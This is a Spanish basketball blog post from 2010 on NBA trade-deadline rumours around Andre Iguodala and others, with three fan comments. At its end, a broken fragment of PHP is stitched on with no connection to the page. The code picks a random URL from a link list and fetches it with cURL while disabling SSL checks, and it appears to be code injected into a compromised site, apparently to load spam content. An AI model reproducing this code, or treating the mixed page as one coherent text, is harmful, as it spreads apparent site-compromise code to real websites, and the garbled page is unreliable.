Iguodala en el Trading Block

06 de February de 2010 por Love Denise
Se acerca la fecha límite para realizar traspasos, y por tanto, algunos equipos buscan nuevos refuerzos que apuntalen sus plantillas mientras otros, que ya han dado la presente temporada por perdida, se centran en llegar a julio con el mínimo salario posible y poder permitirse fichajes en el verano de cara a la próxima temporada.
Si hay un nombre que suena actualmente con fuerza para un posible traspaso, ese es el de Andre Iguodala.

El “otro A.I.” de Philly está completando una notable temporada a nivel individual, con medias de más de 17 puntos por noche, acompañados de 7 rebotes, 6 asistencias y 2 recuperaciones de balón por partido. Sin embargo, su contrato de estrella de 13 millones de dólares por año hacen que en la ciudad del amor fraterno se debatan entre traspasarlo o mantenerlo como líder del equipo. Un posible destino sería Phoenix, donde los Suns estarían dispuestos a intercambiarlo por Amare Stoudemire, lo que nos permitiría adivinar cuál es el verdadero nivel de Amare sin el gran Nash a su lado. Otro destino puede ser Houston, donde Iguodala iría acompañado de Dalembert a cambio de McGrady. No sería mala operación ésta para Philly. Con la presente temporada prácticamente perdida, uniría a dos de las estrellas más mediáticas en el vestuario (Iverson y Tracy), y le permitiría contar con unos 23 millones libres adicionales de cara a la temporada que viene.

En Toronto, los buenos resultados cosechados en la última semana por los Raptors, han acallado un poco los rumores de traspaso de su estrella, el ala-pivot Chris Bosh. Al parecer, la intención del texano es permanecer en Canadá toda lo que resta de temporada. Por si acaso, los Mavericks no le quitan ojo, y no se podría descartar un posible canje por Josh Howard.

En Detroit, ya se da por hecho el fin de ciclo sufrido por el equipo, y no verían con malos ojos el desprenderse de Tayshaun Prince o Richard Hamilton, e incluso, de los dos, tarea que no resultará fácil debido a sus suculentos contratos.

Por último, Cleveland sigue intentando dar un salto cualitativo a su plantilla con el fichaje de Antawn Jamison. Si esta operación fallase, en la recámara se encuentra Troy Murphy.

Comenta

3 comentarios a esta entrada

  1. sergio dice:
    #1

    Vaya! Parece que al final nos hemos animado todos… Cada uno en lo que maneja bien, estais haciendo un magnifico trabajo… No habia escuchado nada de Igoudala. Muy interesante el traspaso a Houston. SIn duda tienen una de las piezas mas codiciadas de aqui a final de año. El unico problema que logro ver en el traspaso es sobrecarga de jugadores exteriores en las posiciones de 2 y 3 (Battier, Ariza, Budinger, Igoudala, Landry) al estilo Portland. Eso, desde luego, no deberia ser un problema propiamente dicho, pero quizas si lo sea flojeando en otras posiciones como base. Brooks esta haciendo un temporadon pero quizas un base de mas garantias permita llevar al señorito Aaron al banquillo para salir como revulsivo. Creo que es el papel que le corresponde sinceramente…. Dalembert seria un recambio perfecto para la teorica vuelta de Yao (que deberiamos ver como vuelve). El puesto de 4 me parece tambien algo abandonado. Igoudala ha jugado ahi en ocasiones (pocos minutos) y Landry, Hayes y Scola hacen un trabajo muy digno, pero me parece que pasan problemas con algunos grandes jugadores en esa posicion.
    Pienso que si Adelman ha conseguido estar donde estan sin sus dos maximas figuras, todo lo que sea mejorar el equipo les acercara a posteriores titulos…

    Aparte de todo esto que me ha dado por soltar… muchas felicidades Denise. Me encanta que hagas informes de estos… se me habra notao en el comentario jaja

      Citar

  2. westcoastrealbetis dice:
    #2

    los suns ofrecieron a los sixers a amare y a barbosa por iggy y dalembert y son los sixers los k se lo estan pensando, iguodala no es un buen lider pero en un ekipo en el que ya haya lideres puede ser el perfecto escudero, para mi que soy de los sixers si hay que traspasarlo mejor k sea para conseguir a amare k a t-mac

      Citar

  3. Dantley2 dice:
    #3

    De acuerdo con el amigo bético, Iguodala ya ha dejado claro que no puede ser un líder, pero de escudero lo puede bordar si el jefe es Nash. Tampoco sería nada malo para él ir a Houston, donde Adelman hace milagros, pero estoy de acuerdo con Sergio que necesitan más material por dentro, aunque creo que ya se han dado cuenta de que Ariza no es lo que esperaban (y yo, que esperaba mucho más, la verdad). A Houston el trade es el de Bosh. Aunque yo no descartaría los dos, Bosh e Iguodala. Aunque no se diga, creo que en Toronto asumen que Bosh volará. Y Houston sí es un sitio que le puede apetecer a Bosh para renovar. Aunque no me extrañaría que ya hubieran hablado y se hubiera apalabrado entre Toronto y Bosh algún sign & trade

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>